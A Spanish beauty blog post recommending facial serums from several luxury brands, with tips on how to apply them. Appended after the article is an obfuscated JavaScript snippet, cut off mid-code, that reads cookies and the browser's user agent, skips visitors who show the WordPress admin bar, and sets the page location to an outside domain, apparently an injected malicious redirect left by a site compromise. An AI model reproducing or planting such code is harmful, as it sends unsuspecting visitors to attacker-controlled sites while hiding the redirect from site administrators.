Por más que trataba de tener la piel hidratada, no terminaba de sentirla bien, hasta que descubrí un nuevo producto para mí: los serum. Es cierto que ya están muy integrados en el mercado y de hecho ya los había usado de forma esporádica, pero nunca lo había incorporado en mi rutina de belleza hasta hace poco tiempo. Los resultados son increíbles: una piel sin brillo pero perfectamente hidratada, sin imperfecciones, saludable y muy bonita, tanto que hasta me han preguntado qué me he hecho en el rostro. La magia ha radicado en ser constante con la aplicación de un buen serum y eso es lo que ha aportado gran cantidad de beneficios en mi piel. ¿Quieres que te los cuente todos?

que-es-el-serum

El poder de los principios activos del serum

Es un producto muy fácil de aplicar y muy agradable, gracias a su rápida absorción, le permite llegar a las zonas más profundas de nuestra piel y actuar directamente allí, con la ventaja de que no deja en ningún caso la piel grasa. Todo lo contrario. Está compuesto por muchos activos concentrados, que es lo que avalan la eficacia del producto.

El Capture Youth Matte Maximizer Sérum Matificante de Dior ayuda a controlar el exceso de brillo y elimina las imperfecciones de la piel. Un 88% de sus ingredientes son de origen natural y el resultado de usarlo a diario es una piel muy equilibrada y de aspecto aterciopelado.

 como-se-usa-el-serum

Cómo aplicarlo

Al ser un producto concentrado, hay que utilizar muy poca cantidad de producto: con 2 o 3 gotas es suficiente. Su aplicación es muy sencilla: debemos realizar un ligero mansaje en sentido horizontal (desde dentro del rostro hacia fuera) y desde la zona del cuello hacia arriba. El C+C Vitamin Complex Cure de Natura Bissé tiene un alto poder concentrado de vitamina C. Repara la piel cuando ha sufrido por el sol o por la contaminación y también contribuye a la producción de colágeno.

Sin embargo, no debemos olvidarnos de que el serum no sustituye a nuestra crema hidratante. Lo que en realidad hace es potenciar los resultados de la hidratación pero en ningún caso es un sustitutivo. Para sentir los beneficios reales del serum, hay que ser muy constantes y lo ideal es utilizarlo dos veces al día (por el día y la noche). Si nos falta tiempo y hay que elegir un solo momento, sin duda sería por la noche.

beneficios-del-serum

Cuántos tipos hay

La mayor parte de la gente piensa que el serum hay que empezar a usarlo cuando ya alcanzan cierta edad (a partir de los 40) y la piel comienza a presentar los signos propios de la edad. De hecho, el Double Serum de Clarins es un tratamiento completo antiedad muy eficaz, que está enriquecido con 20+1 extractos de plantas y revitaliza la piel desde el primer momento. Su textura reafirma la piel y alisa ligeramente las arrugas, aportando luminosidad y la sensación de una piel mucho más joven.

Para reforzar la firmeza, podemos completar el tratamiento con Perfectionist Pro de Estée Lauder, un suero que deja un acabado radiante, con una sensación de efecto lifting muy sorprendente.

Sin embargo, la edad no es el único motivo por el que debemos usar un serum, ya que los hay específicos para otros tratamientos o necesidades como: nutritivo, hidratante o antioxidante. Solo hay que buscar el que más se adapte a nuestras necesidades.

¿Tienes incorporado el serum en tu rutina de belleza? ¿Cuál es el que sueles usar?

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone